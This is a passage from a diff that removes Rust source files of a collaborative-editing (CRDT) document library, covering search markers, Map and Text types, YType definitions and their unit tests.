while let Some(item) = item_ptr.clone().get() {
if marker_index <= index {
break;
}
let left_ref: ItemRef = item.left.clone();
if let Some(left) = left_ref.get() {
if left.indexable() {
marker_index -= left.len();
}
item_ptr = left_ref;
} else {
break;
}
}
// we want to make sure that item_ptr can't be merged with left, because that
// would screw up everything in that case just return what we have
// (it is most likely the best marker anyway) iterate to left until
// item_ptr can't be merged with left
while let Some(item) = item_ptr.clone().get() {
let left_ref: ItemRef = item.left.clone();
if let Some(left) = left_ref.get() {
if left.id.client == item.id.client && left.id.clock + left.len() == item.id.clock {
if left.indexable() {
marker_index -= left.len();
}
item_ptr = left_ref;
continue;
}
break;
} else {
break;
}
}
}
match marker {
Some(marker)
if (marker.index as f64 - marker_index as f64).abs() < parent.len as f64 / MAX_SEARCH_MARKER as f64 =>
{
// adjust existing marker
marker.overwrite_marker(item_ptr, marker_index);
Some(marker.clone())
}
_ => {
// create new marker
Self::mark_position(&mut list, item_ptr, marker_index)
}
}
}
#[allow(dead_code)]
pub fn get_last_marker(&self) -> Option<SearchMarker> {
self.borrow().back().cloned()
}
pub fn replace_marker(&self, raw: Somr<Item>, new: Somr<Item>, len_shift: i64) {
let mut list = self.borrow_mut();
for marker in list.iter_mut() {
if marker.ptr == raw {
marker.ptr = new.clone();
marker.index = ((marker.index as i64) + len_shift) as u64;
}
}
}
}
#[cfg(test)]
mod tests {
#[cfg(not(loom))]
use rand::{Rng, SeedableRng};
#[cfg(not(loom))]
use rand_chacha::ChaCha20Rng;
use yrs::{Array, Options, Transact};
use super::*;
#[test]
fn test_marker_list() {
let options = DocOptions::default();
let yrs_options = Options::default();
loom_model!({
let (client_id, buffer) = if cfg!(miri) {
let doc = Doc::with_options(options.clone());
let mut array = doc.get_or_create_array("abc").unwrap();
array.insert(0, " ").unwrap();
array.insert(0, "Hello").unwrap();
array.insert(2, "World").unwrap();
(doc.client(), doc.encode_update_v1().unwrap())
} else {
let doc = yrs::Doc::with_options(yrs_options.clone());
let array = doc.get_or_insert_array("abc");
let mut trx = doc.transact_mut();
array.insert(&mut trx, 0, " ");
array.insert(&mut trx, 0, "Hello");
array.insert(&mut trx, 2, "World");
(doc.client_id(), trx.encode_update_v1())
};
let mut decoder = RawDecoder::new(&buffer);
let update = Update::read(&mut decoder).unwrap();
let mut doc = Doc::with_options(options.clone());
doc.apply_update(update).unwrap();
let array = doc.get_or_create_array("abc").unwrap();
let marker_list = MarkerList::new();
let marker = marker_list.find_marker(&array.0.ty().unwrap(), 8).unwrap();
assert_eq!(marker.index, 2);
assert_eq!(
marker.ptr,
doc
.store
.read()
.unwrap()
.get_node(Id::new(client_id, 2))
.unwrap()
.as_item()
);
});
}
#[test]
fn test_search_marker_flaky() {
let options = DocOptions::default();
loom_model!({
let doc = Doc::with_options(options.clone());
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, "0").unwrap();
text.insert(1, "1").unwrap();
text.insert(0, "0").unwrap();
});
}
#[cfg(not(loom))]
fn search_with_seed(seed: u64) {
let rand = ChaCha20Rng::seed_from_u64(seed);
let iteration = 20;
let doc = Doc::with_client(1);
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, "This is a string with length 32.").unwrap();
let mut len = text.len();
for i in 0..iteration {
let mut rand: ChaCha20Rng = rand.clone();
let pos = rand.random_range(0..text.len());
let str = format!("hello {i}");
len += str.len() as u64;
text.insert(pos, str).unwrap();
}
assert_eq!(text.len(), len);
assert_eq!(text.to_string().len() as u64, len);
}
#[test]
#[cfg(not(loom))]
fn test_marker_list_with_seed() {
search_with_seed(785590655803394607);
search_with_seed(12958877733367615);
search_with_seed(71776330571528794);
search_with_seed(2207805473582911);
}
}
@@ -1,320 +0,0 @@
use std::{collections::hash_map::Iter, rc::Rc};
use super::*;
use crate::{
JwstCodecResult,
doc::{AsInner, Node, Parent, YTypeRef},
impl_type,
};
impl_type!(Map);
pub(crate) trait MapType: AsInner<Inner = YTypeRef> {
fn _id(&self) -> Option<Id> {
self.as_inner().ty().and_then(|ty| ty.item.get().map(|item| item.id))
}
fn _insert<V: Into<Value>>(&mut self, key: String, value: V) -> JwstCodecResult {
if let Some((mut store, mut ty)) = self.as_inner().write() {
let left = ty.map.get(&SmolStr::new(&key)).cloned();
let item = store.create_item(
value.into().into(),
left.unwrap_or(Somr::none()),
Somr::none(),
Some(Parent::Type(self.as_inner().clone())),
Some(SmolStr::new(key)),
);
store.integrate(Node::Item(item), 0, Some(&mut ty))?;
}
Ok(())
}
fn _get(&self, key: &str) -> Option<Value> {
self.as_inner().ty().and_then(|ty| {
ty.map.get(key).and_then(|item| {
if let Some(item) = item.get() {
if item.deleted() {
return None;
}
Some(Value::from(&item.content))
} else {
None
}
})
})
}
fn _contains_key(&self, key: &str) -> bool {
if let Some(ty) = self.as_inner().ty() {
ty.map
.get(key)
.and_then(|item| item.get())
.is_some_and(|item| !item.deleted())
} else {
false
}
}
fn _remove(&mut self, key: &str) {
if let Some((mut store, mut ty)) = self.as_inner().write()
&& let Some(item) = ty.map.get(key).cloned()
&& let Some(item) = item.get()
{
store.delete_item(item, Some(&mut ty));
}
}
fn _len(&self) -> u64 {
self._keys().count() as u64
}
fn _iter(&self) -> EntriesInnerIterator<'_> {
let ty = self.as_inner().ty();
if let Some(ty) = ty {
let ty = Rc::new(ty);
EntriesInnerIterator {
iter: Some(unsafe { &*Rc::as_ptr(&ty) }.map.iter()),
_lock: Some(ty),
}
} else {
EntriesInnerIterator {
_lock: None,
iter: None,
}
}
}
fn _keys(&self) -> KeysIterator<'_> {
KeysIterator(self._iter())
}
fn _values(&self) -> ValuesIterator<'_> {
ValuesIterator(self._iter())
}
fn _entries(&self) -> EntriesIterator<'_> {
EntriesIterator(self._iter())
}
}
pub(crate) struct EntriesInnerIterator<'a> {
_lock: Option<Rc<RwLockReadGuard<'a, YType>>>,
iter: Option<Iter<'a, SmolStr, ItemRef>>,
}
pub struct KeysIterator<'a>(EntriesInnerIterator<'a>);
pub struct ValuesIterator<'a>(EntriesInnerIterator<'a>);
pub struct EntriesIterator<'a>(EntriesInnerIterator<'a>);
impl<'a> Iterator for EntriesInnerIterator<'a> {
type Item = (&'a str, &'a Item);
fn next(&mut self) -> Option<Self::Item> {
if let Some(iter) = &mut self.iter {
for (k, v) in iter {
if let Some(item) = v.get()
&& !item.deleted()
{
return Some((k.as_str(), item));
}
}
None
} else {
None
}
}
}
impl<'a> Iterator for KeysIterator<'a> {
type Item = &'a str;
fn next(&mut self) -> Option<Self::Item> {
self.0.next().map(|(k, _)| k)
}
}
impl Iterator for ValuesIterator<'_> {
type Item = Value;
fn next(&mut self) -> Option<Self::Item> {
self.0.next().map(|(_, v)| Value::from(&v.content))
}
}
impl<'a> Iterator for EntriesIterator<'a> {
type Item = (&'a str, Value);
fn next(&mut self) -> Option<Self::Item> {
self.0.next().map(|(k, v)| (k, Value::from(&v.content)))
}
}
impl MapType for Map {}
impl Map {
#[inline(always)]
pub fn id(&self) -> Option<Id> {
self._id()
}
#[inline(always)]
pub fn insert<V: Into<Value>>(&mut self, key: String, value: V) -> JwstCodecResult {
self._insert(key, value)
}
#[inline(always)]
pub fn get(&self, key: &str) -> Option<Value> {
self._get(key)
}
#[inline(always)]
pub fn contains_key(&self, key: &str) -> bool {
self._contains_key(key)
}
#[inline(always)]
pub fn remove(&mut self, key: &str) {
self._remove(key)
}
#[inline(always)]
pub fn len(&self) -> u64 {
self._len()
}
#[inline(always)]
pub fn is_empty(&self) -> bool {
self.len() == 0
}
#[inline(always)]
pub fn iter(&self) -> EntriesIterator<'_> {
self._entries()
}
#[inline(always)]
pub fn entries(&self) -> EntriesIterator<'_> {
self._entries()
}
#[inline(always)]
pub fn keys(&self) -> KeysIterator<'_> {
self._keys()
}
#[inline(always)]
pub fn values(&self) -> ValuesIterator<'_> {
self._values()
}
}
impl serde::Serialize for Map {
fn serialize<S: serde::Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> {
use serde::ser::SerializeMap;
let mut map = serializer.serialize_map(Some(self.len() as usize))?;
for (key, value) in self.iter() {
map.serialize_entry(&key, &value)?;
}
map.end()
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::{Any, Doc, loom_model};
#[test]
fn test_map_basic() {
loom_model!({
let doc = Doc::new();
let mut map = doc.get_or_create_map("map").unwrap();
map.insert("1".to_string(), "value").unwrap();
assert_eq!(map.get("1").unwrap(), Value::Any(Any::String("value".to_string())));
assert!(!map.contains_key("nonexistent_key"));
assert_eq!(map.len(), 1);
assert!(map.contains_key("1"));
map.remove("1");
assert!(!map.contains_key("1"));
assert_eq!(map.len(), 0);
});
}
#[test]
fn test_map_equal() {
loom_model!({
let doc = Doc::new();
let mut map = doc.get_or_create_map("map").unwrap();
map.insert("1".to_string(), "value").unwrap();
map.insert("2".to_string(), false).unwrap();
let binary = doc.encode_update_v1().unwrap();
let new_doc = Doc::try_from_binary_v1(binary).unwrap();
let map = new_doc.get_or_create_map("map").unwrap();
assert_eq!(map.get("1").unwrap(), Value::Any(Any::String("value".to_string())));
assert_eq!(map.get("2").unwrap(), Value::Any(Any::False));
assert_eq!(map.len(), 2);
});
}
#[test]
fn test_map_renew_value() {
loom_model!({
let doc = Doc::new();
let mut map = doc.get_or_create_map("map").unwrap();
map.insert("1".to_string(), "value").unwrap();
map.insert("1".to_string(), "value2").unwrap();
assert_eq!(map.get("1").unwrap(), Value::Any(Any::String("value2".to_string())));
assert_eq!(map.len(), 1);
});
}
#[test]
fn test_map_re_encode() {
loom_model!({
let binary = {
let doc = Doc::new();
let mut map = doc.get_or_create_map("map").unwrap();
map.insert("1".to_string(), "value1").unwrap();
map.insert("2".to_string(), "value2").unwrap();
doc.encode_update_v1().unwrap()
};
{
let doc = Doc::try_from_binary_v1(binary).unwrap();
let map = doc.get_or_create_map("map").unwrap();
assert_eq!(map.get("1").unwrap(), Value::Any(Any::String("value1".to_string())));
assert_eq!(map.get("2").unwrap(), Value::Any(Any::String("value2".to_string())));
}
});
}
#[test]
fn test_map_iter() {
loom_model!({
let doc = Doc::new();
let mut map = doc.get_or_create_map("map").unwrap();
map.insert("1".to_string(), "value1").unwrap();
map.insert("2".to_string(), "value2").unwrap();
let mut vec = map.entries().collect::<Vec<_>>();
// hashmap iteration is in random order instead of insert order
vec.sort_by(|a, b| a.0.cmp(b.0));
assert_eq!(
vec,
vec![
("1", Value::Any(Any::String("value1".to_string()))),
("2", Value::Any(Any::String("value2".to_string())))
]
)
});
}
}
@@ -1,373 +0,0 @@
mod array;
mod list;
mod map;
mod text;
mod value;
mod xml;
use std::{
collections::hash_map::Entry,
hash::{Hash, Hasher},
sync::Weak,
};
pub use array::*;
use list::*;
pub use map::*;
pub use text::*;
pub use value::*;
pub use xml::*;
use super::{
store::{StoreRef, WeakStoreRef},
*,
};
use crate::{
Item, JwstCodecError, JwstCodecResult,
sync::{Arc, RwLock, RwLockReadGuard, RwLockWriteGuard},
};
#[derive(Debug, Default)]
pub(crate) struct YType {
pub start: Somr<Item>,
pub item: Somr<Item>,
pub map: HashMap<SmolStr, Somr<Item>>,
pub len: u64,
/// The tag name of XMLElement and XMLHook type
pub name: Option<String>,
/// The name of the type that directly belongs the store.
pub root_name: Option<String>,
kind: YTypeKind,
pub markers: Option<MarkerList>,
}
#[derive(Debug, Default, Clone)]
pub(crate) struct YTypeRef {
pub store: WeakStoreRef,
pub inner: Somr<RwLock<YType>>,
}
impl PartialEq for YType {
fn eq(&self, other: &Self) -> bool {
self.root_name == other.root_name || (self.start.is_some() && self.start == other.start) || self.map == other.map
}
}
impl PartialEq for YTypeRef {
fn eq(&self, other: &Self) -> bool {
// only check pointer equality
// currently no scenarios that involve cross document ytype comparisons
self.inner.ptr_eq(&other.inner)
}
}
impl Eq for YTypeRef {}
impl Hash for YTypeRef {
fn hash<H: Hasher>(&self, state: &mut H) {
self.inner.ptr().hash(state);
}
}
impl YType {
pub fn new(kind: YTypeKind, tag_name: Option<String>) -> Self {
YType {
kind,
name: tag_name,
..YType::default()
}
}
pub fn kind(&self) -> YTypeKind {
self.kind
}
pub fn set_kind(&mut self, kind: YTypeKind) -> JwstCodecResult {
std::debug_assert!(kind != YTypeKind::Unknown);
if self.kind() != kind {
if self.kind == YTypeKind::Unknown {
self.kind = kind;
} else {
return Err(JwstCodecError::TypeCastError(kind.as_str()));
}
}
Ok(())
}
}
impl YTypeRef {
pub fn new(kind: YTypeKind, tag_name: Option<String>) -> Self {
Self {
inner: Somr::new(RwLock::new(YType::new(kind, tag_name))),
store: Weak::new(),
}
}
pub fn ty(&self) -> Option<RwLockReadGuard<'_, YType>> {
self.inner.get().and_then(|ty| ty.read().ok())
}
pub fn ty_mut(&self) -> Option<RwLockWriteGuard<'_, YType>> {
self.inner.get().and_then(|ty| ty.write().ok())
}
#[allow(dead_code)]
pub fn store<'a>(&self) -> Option<RwLockReadGuard<'a, DocStore>> {
if let Some(store) = self.store.upgrade() {
let ptr = unsafe { &*Arc::as_ptr(&store) };
Some(ptr.read().unwrap())
} else {
None
}
}
pub fn store_mut<'a>(&self) -> Option<RwLockWriteGuard<'a, DocStore>> {
if let Some(store) = self.store.upgrade() {
let ptr = unsafe { &*Arc::as_ptr(&store) };
Some(ptr.write().unwrap())
} else {
None
}
}
#[allow(dead_code)]
pub fn read(&self) -> Option<(RwLockReadGuard<'_, DocStore>, RwLockReadGuard<'_, YType>)> {
self.store().zip(self.ty())
}
pub fn write(&self) -> Option<(RwLockWriteGuard<'_, DocStore>, RwLockWriteGuard<'_, YType>)> {
self.store_mut().zip(self.ty_mut())
}
}
pub(crate) struct YTypeBuilder {
store: StoreRef,
/// The tag name of XMLElement and XMLHook type
name: Option<String>,
/// The name of the type that directly belongs the store.
root_name: Option<String>,
kind: YTypeKind,
}
impl YTypeBuilder {
pub fn new(store: StoreRef) -> Self {
Self {
store,
name: None,
root_name: None,
kind: YTypeKind::Unknown,
}
}
pub fn with_kind(mut self, kind: YTypeKind) -> Self {
self.kind = kind;
self
}
pub fn set_name(mut self, name: String) -> Self {
self.root_name = Some(name);
self
}
#[allow(dead_code)]
pub fn set_tag_name(mut self, tag_name: String) -> Self {
self.name = Some(tag_name);
self
}
pub fn build_exists<T: TryFrom<YTypeRef, Error = JwstCodecError>>(self) -> JwstCodecResult<T> {
let store = self.store.read().unwrap();
let ty = if let Some(root_name) = self.root_name {
match store.types.get(&root_name) {
Some(ty) => ty.clone(),
None => {
return Err(JwstCodecError::RootStructNotFound(root_name));
}
}
} else {
return Err(JwstCodecError::TypeCastError("root_name is not set"));
};
drop(store);
T::try_from(ty)
}
pub fn build<T: TryFrom<YTypeRef, Error = JwstCodecError>>(self) -> JwstCodecResult<T> {
let mut store = self.store.write().unwrap();
let ty = if let Some(root_name) = self.root_name {
match store.types.entry(root_name.clone()) {
Entry::Occupied(e) => e.get().clone(),
Entry::Vacant(e) => {
let inner = Somr::new(RwLock::new(YType {
kind: self.kind,
name: self.name,
root_name: Some(root_name),
markers: Self::markers(self.kind),
..Default::default()
}));
let ty = YTypeRef {
store: Arc::downgrade(&self.store),
inner,
};
let ty_ref = ty.clone();
e.insert(ty);
ty_ref
}
}
} else {
let inner = Somr::new(RwLock::new(YType {
kind: self.kind,
name: self.name,
root_name: self.root_name.clone(),
markers: Self::markers(self.kind),
..Default::default()
}));
let ty = YTypeRef {
store: Arc::downgrade(&self.store),
inner,
};
let ty_ref = ty.clone();
store.dangling_types.insert(ty.inner.ptr().as_ptr() as usize, ty);
ty_ref
};
drop(store);
T::try_from(ty)
}
fn markers(kind: YTypeKind) -> Option<MarkerList> {
match kind {
YTypeKind::Map => None,
_ => Some(MarkerList::new()),
}
}
}
#[macro_export(local_inner_macros)]
macro_rules! impl_variants {
({$($name: ident: $codec_ref: literal),*}) => {
#[derive(Debug, Clone, Copy, PartialEq, Default)]
pub enum YTypeKind {
$($name,)*
#[default]
Unknown,
}
impl YTypeKind {
pub fn as_str(&self) -> &'static str {
match self {
$(YTypeKind::$name => std::stringify!($name),)*
YTypeKind::Unknown => "Unknown",
}
}
}
impl From<u64> for YTypeKind {
fn from(value: u64) -> Self {
match value {
$($codec_ref => YTypeKind::$name,)*
_ => YTypeKind::Unknown,
}
}
}
impl From<YTypeKind> for u64 {
fn from(value: YTypeKind) -> Self {
std::debug_assert!(value != YTypeKind::Unknown);
match value {
$(YTypeKind::$name => $codec_ref,)*
_ => std::unreachable!(),
}
}
}
};
}
pub(crate) trait AsInner {
type Inner;
fn as_inner(&self) -> &Self::Inner;
}
#[macro_export(local_inner_macros)]
macro_rules! impl_type {
($name: ident) => {
#[derive(Debug, Clone, PartialEq)]
pub struct $name(pub(crate) super::YTypeRef);
unsafe impl Sync for $name {}
unsafe impl Send for $name {}
impl $name {
pub(crate) fn new(inner: super::YTypeRef) -> Self {
Self(inner)
}
}
impl super::AsInner for $name {
type Inner = super::YTypeRef;
#[inline(always)]
fn as_inner(&self) -> &Self::Inner {
&self.0
}
}
impl TryFrom<super::YTypeRef> for $name {
type Error = $crate::JwstCodecError;
fn try_from(value: super::YTypeRef) -> Result<Self, Self::Error> {
if let Some((_, mut inner)) = value.write() {
match inner.kind {
super::YTypeKind::$name => Ok($name::new(value.clone())),
super::YTypeKind::Unknown => {
inner.set_kind(super::YTypeKind::$name)?;
Ok($name::new(value.clone()))
}
_ => Err($crate::JwstCodecError::TypeCastError(std::stringify!($name))),
}
} else {
Err($crate::JwstCodecError::TypeCastError(std::stringify!($name)))
}
}
}
impl $name {
pub(crate) fn from_unchecked(value: super::YTypeRef) -> Self {
$name::new(value.clone())
}
}
impl From<$name> for super::Value {
fn from(value: $name) -> Self {
Self::$name(value)
}
}
};
}
impl_variants!({
Array: 0,
Map: 1,
Text: 2,
XMLElement: 3,
XMLFragment: 4,
XMLHook: 5,
XMLText: 6
// Doc: 9?
});
@@ -1,829 +0,0 @@
use std::{collections::BTreeMap, fmt::Display};
use super::{AsInner, list::ListType};
use crate::{
Any, Content, JwstCodecError, JwstCodecResult,
doc::{DocStore, ItemRef, Node, Parent, Somr, YType, YTypeRef},
impl_type,
};
impl_type!(Text);
impl ListType for Text {}
#[derive(Debug, Clone, PartialEq, serde::Serialize, serde::Deserialize)]
#[serde(untagged)]
pub enum TextInsert {
Text(String),
Embed(Vec<Any>),
}
#[derive(Debug, Clone, PartialEq, serde::Serialize, serde::Deserialize)]
#[serde(untagged)]
pub enum TextDeltaOp {
Insert {
insert: TextInsert,
#[serde(skip_serializing_if = "Option::is_none")]
format: Option<TextAttributes>,
},
Retain {
retain: u64,
#[serde(skip_serializing_if = "Option::is_none")]
format: Option<TextAttributes>,
},
Delete {
delete: u64,
},
}
pub type TextDelta = Vec<TextDeltaOp>;
pub type TextAttributes = BTreeMap<String, Any>;
impl Text {
#[inline]
pub fn len(&self) -> u64 {
self.content_len()
}
#[inline]
pub fn is_empty(&self) -> bool {
self.len() == 0
}
#[inline]
pub fn insert<T: ToString>(&mut self, char_index: u64, str: T) -> JwstCodecResult {
self.insert_at(char_index, Content::String(str.to_string()))
}
#[inline]
pub fn remove(&mut self, char_index: u64, len: u64) -> JwstCodecResult {
self.remove_at(char_index, len)
}
pub fn to_delta(&self) -> TextDelta {
let mut ops = Vec::new();
let mut attrs = TextAttributes::new();
for item_ref in self.iter_item() {
if let Some(item) = item_ref.get() {
match &item.content {
Content::Format { key, value } => {
if is_nullish(value) {
attrs.remove(key.as_str());
} else {
attrs.insert(key.to_string(), value.clone());
}
}
Content::String(text) => {
push_insert(&mut ops, TextInsert::Text(text.clone()), &attrs);
}
Content::Embed(embed) => {
push_insert(&mut ops, TextInsert::Embed(vec![embed.clone()]), &attrs);
}
Content::Any(any) => {
push_insert(&mut ops, TextInsert::Embed(any.clone()), &attrs);
}
Content::Json(values) => {
let converted = values
.iter()
.map(|value| value.as_ref().map(|s| Any::String(s.clone())).unwrap_or(Any::Undefined))
.collect::<Vec<_>>();
push_insert(&mut ops, TextInsert::Embed(converted), &attrs);
}
Content::Binary(value) => {
push_insert(&mut ops, TextInsert::Embed(vec![Any::Binary(value.clone())]), &attrs);
}
_ => {}
}
}
}
ops
}
pub fn apply_delta(&mut self, delta: &[TextDeltaOp]) -> JwstCodecResult {
let (mut store, mut ty) = self.as_inner().write().ok_or(JwstCodecError::DocReleased)?;
let parent = self.as_inner().clone();
let mut pos = TextPosition::new(parent, ty.start.clone());
for op in delta {
match op {
TextDeltaOp::Insert { insert, format } => {
let attrs = format.clone().unwrap_or_default();
match insert {
TextInsert::Text(text) => {
insert_text_content(&mut store, &mut ty, &mut pos, Content::String(text.clone()), attrs)?;
}
TextInsert::Embed(values) => {
for value in values {
insert_text_content(
&mut store,
&mut ty,
&mut pos,
Content::Embed(value.clone()),
attrs.clone(),
)?;
}
}
}
}
TextDeltaOp::Retain { retain, format } => {
let attrs = format.clone().unwrap_or_default();
if attrs.is_empty() {
advance_text_position(&mut store, &mut pos, *retain)?;
} else {
format_text(&mut store, &mut ty, &mut pos, *retain, attrs)?;
}
}
TextDeltaOp::Delete { delete } => {
delete_text(&mut store, &mut ty, &mut pos, *delete)?;
}
}
}
Ok(())
}
}
impl Display for Text {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
self.iter_item().try_for_each(|item| {
if let Content::String(str) = &item.get().unwrap().content {
write!(f, "{str}")
} else {
Ok(())
}
})
}
}
impl serde::Serialize for Text {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: serde::Serializer,
{
serializer.serialize_str(&self.to_string())
}
}
struct TextPosition {
parent: YTypeRef,
left: ItemRef,
right: ItemRef,
index: u64,
attrs: TextAttributes,
}
impl TextPosition {
fn new(parent: YTypeRef, right: ItemRef) -> Self {
Self {
parent,
left: Somr::none(),
right,
index: 0,
attrs: TextAttributes::new(),
}
}
fn forward(&mut self) {
if let Some(right) = self.right.get() {
if !right.deleted() {
if let Content::Format { key, value } = &right.content {
if is_nullish(value) {
self.attrs.remove(key.as_str());
} else {
self.attrs.insert(key.to_string(), value.clone());
}
} else if right.countable() {
self.index += right.len();
}
}
self.left = self.right.clone();
self.right = right.right.clone();
}
}
}
fn is_nullish(value: &Any) -> bool {
matches!(value, Any::Null | Any::Undefined)
}
fn push_insert(ops: &mut Vec<TextDeltaOp>, insert: TextInsert, attrs: &TextAttributes) {
let format = if attrs.is_empty() { None } else { Some(attrs.clone()) };
if let Some(TextDeltaOp::Insert {
insert: TextInsert::Text(prev),
format: prev_format,
}) = ops.last_mut()
&& let TextInsert::Text(text) = insert
{
if prev_format.as_ref() == format.as_ref() {
prev.push_str(&text);
return;
}
ops.push(TextDeltaOp::Insert {
insert: TextInsert::Text(text),
format,
});
return;
}
ops.push(TextDeltaOp::Insert { insert, format });
}
fn advance_text_position(store: &mut DocStore, pos: &mut TextPosition, mut remaining: u64) -> JwstCodecResult {
while remaining > 0 {
let Some(item) = pos.right.get() else {
return Err(JwstCodecError::IndexOutOfBound(pos.index + remaining));
};
if item.deleted() {
pos.forward();
continue;
}
if matches!(item.content, Content::Format { .. }) {
pos.forward();
continue;
}
let item_len = item.len();
if remaining < item_len {
let (left, right) = store.split_node(item.id, remaining)?;
pos.left = left.as_item();
pos.right = right.as_item();
pos.index += remaining;
break;
}
remaining -= item_len;
pos.forward();
}
Ok(())
}
fn minimize_attribute_changes(pos: &mut TextPosition, attrs: &TextAttributes) {
while let Some(item) = pos.right.get() {
if item.deleted() {
pos.forward();
continue;
}
if let Content::Format { key, value } = &item.content {
let attr = attrs.get(key.as_str()).cloned().unwrap_or(Any::Null);
if attr == *value {
pos.forward();
continue;
}
}
break;
}
}
fn insert_item(store: &mut DocStore, ty: &mut YType, pos: &mut TextPosition, content: Content) -> JwstCodecResult {
if let Some(markers) = &ty.markers
&& content.countable()
{
markers.update_marker_changes(pos.index, content.clock_len() as i64);
}
let item = store.create_item(
content,
pos.left.clone(),
pos.right.clone(),
Some(Parent::Type(pos.parent.clone())),
None,
);
let item_ref = item.clone();
store.integrate(Node::Item(item), 0, Some(ty))?;
pos.right = item_ref;
pos.forward();
Ok(())
}
fn insert_attributes(
store: &mut DocStore,
ty: &mut YType,
pos: &mut TextPosition,
attrs: &TextAttributes,
) -> JwstCodecResult<TextAttributes> {
let mut negated = TextAttributes::new();
for (key, value) in attrs {
let current = pos.attrs.get(key.as_str()).cloned().unwrap_or(Any::Null);
if current == *value {
continue;
}
negated.insert(key.to_string(), current);
insert_item(
store,
ty,
pos,
Content::Format {
key: key.to_string(),
value: value.clone(),
},
)?;
}
Ok(negated)
}
fn insert_negated_attributes(
store: &mut DocStore,
ty: &mut YType,
pos: &mut TextPosition,
mut negated: TextAttributes,
) -> JwstCodecResult {
while let Some(item) = pos.right.get() {
if item.deleted() {
pos.forward();
continue;
}
if let Content::Format { key, value } = &item.content
&& let Some(negated_value) = negated.get(key.as_str())
&& negated_value == value
{
negated.remove(key.as_str());
pos.forward();
continue;
}
break;
}
for (key, value) in negated {
insert_item(
store,
ty,
pos,
Content::Format {
key: key.to_string(),
value,
},
)?;
}
Ok(())
}
fn insert_text_content(
store: &mut DocStore,
ty: &mut YType,
pos: &mut TextPosition,
content: Content,
mut attrs: TextAttributes,
) -> JwstCodecResult {
for key in pos.attrs.keys() {
if !attrs.contains_key(key.as_str()) {
attrs.insert(key.to_string(), Any::Null);
}
}
minimize_attribute_changes(pos, &attrs);
let negated = insert_attributes(store, ty, pos, &attrs)?;
insert_item(store, ty, pos, content)?;
insert_negated_attributes(store, ty, pos, negated)?;
Ok(())
}
fn format_text(
store: &mut DocStore,
ty: &mut YType,
pos: &mut TextPosition,
mut remaining: u64,
attrs: TextAttributes,
) -> JwstCodecResult {
if remaining == 0 {
return Ok(());
}
minimize_attribute_changes(pos, &attrs);
let mut negated = insert_attributes(store, ty, pos, &attrs)?;
while remaining > 0 {
let Some(item) = pos.right.get() else {
break;
};
if item.deleted() {
pos.forward();
continue;
}
match &item.content {
Content::Format { key, value } => {
if let Some(attr) = attrs.get(key.as_str()) {
if attr == value {
negated.remove(key.as_str());
} else {
negated.insert(key.to_string(), value.clone());
}
store.delete_item(item, Some(ty));
pos.forward();
} else {
pos.forward();
}
}
_ => {
let item_len = item.len();
if remaining < item_len {
store.split_node(item.id, remaining)?;
remaining = 0;
} else {
remaining -= item_len;
}
pos.forward();
}
}
}
insert_negated_attributes(store, ty, pos, negated)?;
Ok(())
}
fn delete_text(store: &mut DocStore, ty: &mut YType, pos: &mut TextPosition, mut remaining: u64) -> JwstCodecResult {
if remaining == 0 {
return Ok(());
}
let start = remaining;
while remaining > 0 {
let item_ref = pos.right.clone();
let Some((indexable, item_len, item_id)) = item_ref.get().map(|item| (item.indexable(), item.len(), item.id))
else {
break;
};
if indexable {
if remaining < item_len {
store.split_node(item_id, remaining)?;
remaining = 0;
} else {
remaining -= item_len;
}
if let Some(item) = item_ref.get() {
store.delete_item(item, Some(ty));
}
}
pos.forward();
}
if let Some(markers) = &ty.markers {
markers.update_marker_changes(pos.index, -((start - remaining) as i64));
}
Ok(())
}
#[cfg(test)]
mod tests {
use rand::{Rng, SeedableRng};
use rand_chacha::ChaCha20Rng;
use yrs::{Options, Text, Transact};
use super::{TextAttributes, TextDeltaOp, TextInsert};
#[cfg(not(loom))]
use crate::sync::{Arc, AtomicUsize, Ordering};
use crate::{Any, Doc, loom_model, sync::thread};
#[test]
fn test_manipulate_text() {
loom_model!({
let doc = Doc::new();
let mut text = doc.create_text().unwrap();
text.insert(0, "llo").unwrap();
text.insert(0, "he").unwrap();
text.insert(5, " world").unwrap();
text.insert(6, "great ").unwrap();
text.insert(17, '!').unwrap();
assert_eq!(text.to_string(), "hello great world!");
assert_eq!(text.len(), 18);
text.remove(4, 4).unwrap();
assert_eq!(text.to_string(), "helleat world!");
assert_eq!(text.len(), 14);
});
}
#[test]
#[cfg(not(loom))]
fn test_parallel_insert_text() {
let seed = rand::rng().random();
let rand = ChaCha20Rng::seed_from_u64(seed);
let mut handles = Vec::new();
let doc = Doc::with_client(1);
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, "This is a string with length 32.").unwrap();
let added_len = Arc::new(AtomicUsize::new(32));
// parallel editing text
{
for i in 0..2 {
let mut text = text.clone();
let mut rand = rand.clone();
let len = added_len.clone();
handles.push(thread::spawn(move || {
for j in 0..10 {
let pos = rand.random_range(0..text.len());
let string = format!("hello {}", i * j);
text.insert(pos, &string).unwrap();
len.fetch_add(string.len(), Ordering::SeqCst);
}
}));
}
}
// parallel editing doc
{
for i in 0..2 {
let doc = doc.clone();
let mut rand = rand.clone();
let len = added_len.clone();
handles.push(thread::spawn(move || {
let mut text = doc.get_or_create_text("test").unwrap();
for j in 0..10 {
let pos = rand.random_range(0..text.len());
let string = format!("hello doc{}", i * j);
text.insert(pos, &string).unwrap();
len.fetch_add(string.len(), Ordering::SeqCst);
}
}));
}
}
for handle in handles {
handle.join().unwrap();
}
assert_eq!(text.to_string().len(), added_len.load(Ordering::SeqCst));
assert_eq!(text.len(), added_len.load(Ordering::SeqCst) as u64);
}
#[cfg(not(loom))]
fn parallel_ins_del_text(seed: u64, thread: i32, iteration: i32) {
let doc = Doc::with_client(1);
let rand = ChaCha20Rng::seed_from_u64(seed);
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, "This is a string with length 32.").unwrap();
let mut handles = Vec::new();
let len = Arc::new(AtomicUsize::new(32));
for i in 0..thread {
let len = len.clone();
let mut rand = rand.clone();
let text = text.clone();
handles.push(thread::spawn(move || {
for j in 0..iteration {
let len = len.clone();
let mut text = text.clone();
let ins = i % 2 == 0;
let pos = rand.random_range(0..16);
if ins {
let str = format!("hello {}", i * j);
text.insert(pos, &str).unwrap();
len.fetch_add(str.len(), Ordering::SeqCst);
} else {
